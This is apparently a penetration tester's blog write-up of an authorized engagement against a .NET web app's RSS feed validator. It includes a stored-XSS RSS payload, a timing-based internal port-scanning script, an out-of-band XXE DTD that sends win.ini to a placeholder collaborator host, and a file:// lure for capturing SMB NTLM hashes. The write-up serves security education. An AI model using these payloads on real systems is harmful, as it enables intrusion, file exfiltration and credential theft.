TL;DR – I found stored XSS, timing-based internal network discovery (SSRF), and XXE file exfil plus SMB cred harvest, all in a single Internet-facing web app's RSS functionality.
Note: My employer was initially fine with me posting reasonably-redacted screenshots but then didn’t put that in writing, so I mocked them up the best I could. Some weren’t feasible to mock up so I left those out. Sorry ¯\_(ツ)_/¯
On a recent engagement, I achieved possibly the highest vulnerability:functionality ratio I’ve ever seen personally. Three separate vulnerabilities, in one function, in one web app.
It was a beast of an app, written in .NET/ASP, which is not something I'm intimately familiar with. I spent a good chunk of time learning how VIEWSTATE works, along with the various related attacks and defenses. They had pretty solid input filtering; anything that even looked like it might be a script tag (even HTML bold tags) was flagged and an error thrown, so anything flowing from my keyboard to their servers was unlikely to pop XSS. They had similarly good SQLi defenses in place, so after a day of poking at both I moved on to other things.
In a few places you could upload files that were retrieved later in other pages, but again they used really strict filetype checking. We're talking file extension, contents, rejecting embedded files, everything. And on the retrieval side, everything was returned as an attachment, so no RCE for me.
None of this is particularly relevant, just setting the scene for how frustrated I was at this point.
While trying these things I was still sorta mapping out the application from a user (technically admin) standpoint, when I came across a “Manage News Feeds” link. The purpose was to provide an RSS feed URL which would be embedded on the home page. The two buttons were for testing the feed and then saving it if valid. A good feed would look like this:
while a bad one looked like this:
(images slightly modified from original)
Pretty simple. If it was valid you could save it and the contents would be fetched and rendered each time the home page was reloaded.
Vuln The First
I had mentioned earlier that XSS was pretty much covered “from my keyboard to their servers”. While testing the functionality, I used the following URL as a sample valid RSS feed to see how it would validate and render:
It’s static, and has pretty much what you would expect from RSS, so I figured it would be a good test. When I loaded the URL and clicked Validate Feed, it came back saying it was good so I saved it and reloaded the home page.
To my surprise, there was colored text on the page. And bold. And italics. Check the RSS source and you’ll see what I mean. Basically, there was no escaping or sanitization done on the RSS contents.
It didn't take too many additional brain cells to make the leap to XSS. I loaded up Pastebin and copied a very basic valid RSS doc from W3Schools, modified to include a simple XSS alert() PoC (hex-encoded):
then I grabbed the URL, validated it, saved it, and smiled as my alert box popped on the home screen.
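I can't share the actual Pastebin doc, but a minimal reconstruction of that style of payload might look something like this (the titles, URLs, and alert string are all placeholders, not the originals):

```xml
<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
  <channel>
    <title>Totally Normal News</title>
    <link>https://example.com/</link>
    <description>Nothing to see here</description>
    <item>
      <title>Breaking news</title>
      <!-- CDATA keeps the feed valid XML while delivering raw HTML/JS
           to anything that renders the description unescaped -->
      <description><![CDATA[<script>alert(document.domain)</script>]]></description>
    </item>
  </channel>
</rss>
```

Host something like that anywhere you control a raw URL, validate it, save it, and every visitor to the home page executes the script.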
Vuln The Second
Alright, so that was a good start but I wanted more.
In my testing of the Validate Feed button I put in some junk domains and noticed that they took longer to return than any valid feed. In fact, it didn't even seem to matter whether the feed was valid at all, only whether the site was listening on 80 or 443. So basically: if a host is up, the request returns quickly; otherwise there is a measurable delay.
Using Burp Intruder, I was able to feed a list of known internal IP addresses and ports and measure the response times. I got three kinds of responses:
Fast response (r < 600ms)
Slow response (r > 5000ms)
Average response (1000ms < r < 2000ms)
(other responses in above screenshots)
The fast and slow responses correlated with common ports you would expect to see on a Windows web server, and the client confirmed that was in fact the case. I could have gone on enumerating more internal systems, but the point was made already.
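The Intruder workflow above can be sketched in a few lines. This is a hedged reconstruction, not the actual tooling: `validate` stands in for whatever submits the Validate Feed request, and the thresholds just echo the buckets listed above.

```python
import time

def classify(rt_ms):
    """Map a Validate Feed round-trip time (in ms) to a guess about the target."""
    if rt_ms < 600:
        return "fast"      # something answered the connect immediately
    if rt_ms > 5000:
        return "slow"      # connect timed out: host down or filtered
    return "average"       # in between: likely host up, port closed

def probe(validate, host, port):
    """Time one server-side fetch of http://host:port/ via the app."""
    start = time.monotonic()
    validate(f"http://{host}:{port}/")   # the app does the fetching for us
    return (time.monotonic() - start) * 1000.0
```

Feed `probe` a list of internal IPs and ports and the response-time buckets map out the network for you, all from the server's vantage point.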
Now for the really fun part.
Vuln The Third
I had read about XXE and played around with it in some labs but never encountered it in the wild, so I figured now would be a good time to test for it. Using some sample XXE payloads saved in Pastebin and loaded into the Validate Feed form I was able to confirm that external sites would be requested.
Using these I tested reading a file on disk, targeting C:\windows\win.ini since it was a Windows box. I actually had some trouble getting this to pop and had to rubber-duck debug, bouncing ideas off a co-worker.
Basically I had two raw Pastebin links and a Burp Collaborator domain. The first Pastebin link contained lines 44 and 45 from the same Gist, with the Burp Collaborator domain as the target instead of x.x.x.x. The second Pastebin link contained the XXE payload starting on line 33 there, with the first Pastebin link in place of the original URL.
I loaded the first Pastebin link into the RSS Feed box, clicked Validate Feed and…
60 seconds of nothing, to be exact. 60 seconds is a fairly specific time-frame in IT; it usually ends up being network related, with my standard bet being DNS (pro tip: it's always DNS).
This time it wasn't DNS though, because Burp Collaborator was still registering a DNS query, just no HTTP request. As it turns out, using http:// as the scheme with :443 as the port can cause some systems to simply not make the HTTP request, because pOrT 443 iS aLwAyS hTtPs. Whatever, I'm not bitter about it.
Anyway, long story short, I dropped the :443 from the Collaborator domain and it worked perfectly:

I got the contents of win.ini via the GET request and, with 5 minutes left in the day, took a victory lap around the office. jk, I just cheered and shut down for the day after logging my evidence.
Note: I was unable to embed the file contents in the RSS feed itself for some reason. I didn’t end up having enough time to figure out why, but the end result was the same.
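For reference, here's a reconstruction of what a two-stage out-of-band XXE setup like the one described above typically looks like. The URLs and entity names are placeholders (the actual Gist may differ), but the mechanics match:

```xml
<!-- Stage 2: the "feed" URL handed to Validate Feed.
     The internal subset pulls in the external DTD hosted at the
     first Pastebin link (placeholder URL here). -->
<!DOCTYPE rss [
  <!ENTITY % dtd SYSTEM "https://pastebin.example/raw/STAGE1">
  %dtd;
]>
<rss version="2.0"><channel><title>x</title></channel></rss>

<!-- Stage 1: the two-line external DTD hosted at that link.
     It reads the file, then builds and fires the exfil request.
     Note the plain http:// scheme with NO :443 suffix, per the
     60-seconds-of-nothing lesson above. -->
<!ENTITY % file SYSTEM "file:///C:/windows/win.ini">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://YOUR-ID.burpcollaborator.net/?d=%file;'>">
%eval;
%exfil;
```

The file contents ride out in the query string of the GET request to Collaborator.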
Vuln The Third (And A Half)
As I was packing up, my co-worker said something to the effect of “Congrats on that XXE, lemme know what kind of RCE you get from it”.
Literally me a second later:
In my haste to learn only the bare minimum to get by, I had neglected to ever play with XXE's supposed RCE capabilities.
Sadly, in this case I don't think there was much hope. I tried various C# functions, even one that literally just had return 0;, and all of them caused application errors. Then I saw this comment on the above-linked article: apparently this only works when XSLT parsing is done, which I doubt was the case here. That, or there was some protection in place against this sort of attack. That, or I didn't Try Harder™.
At any rate, I was still able to do some pretty cool stuff with it. I spun up an SMB listener on an AWS Kali box and fed the RSS validator a file:// URL pointing at my listener, which caused the target server to make an authenticated SMB request to it:
[ image redacted 😦 ]
A request like this includes an NTLM challenge-response derived from the account's password hash, which a legitimate SMB server would need in order to authenticate the client and serve it content. But I was not running a legitimate server; I just wanted their hash. Which I got:
Fairly redacted of course, but I managed to get the hashed credentials. A few times, actually; must be some baked-in retry logic somewhere. Sadly I did not end up cracking this password, as the engagement was coming to an end and we needed the cracking rig for other things.
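For completeness, a hedged sketch of the lure itself; the IP, share, and filename below are placeholders rather than the actual engagement values:

```python
# The server-side fetcher follows file:// URLs, and a file:// URL with a
# remote host becomes a UNC path on Windows, triggering SMB authentication.
# On the listener side, tools like Responder or impacket-smbserver log the
# inbound NetNTLMv2 challenge-response for offline cracking (hashcat mode 5600).

def smb_lure(listener_ip, share="x", name="feed.xml"):
    """Build a file:// URL that forces the server to authenticate over SMB."""
    return f"file://{listener_ip}/{share}/{name}"
```

Drop the resulting URL into the RSS validator and wait for the server's machine or service account to come knocking.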
Conclusion The First
Be thorough, and don’t move on from something just because you already found a way to exploit it. Bugs like to clump together, so keep an eye out for similar classes of vulnerabilities if you find one.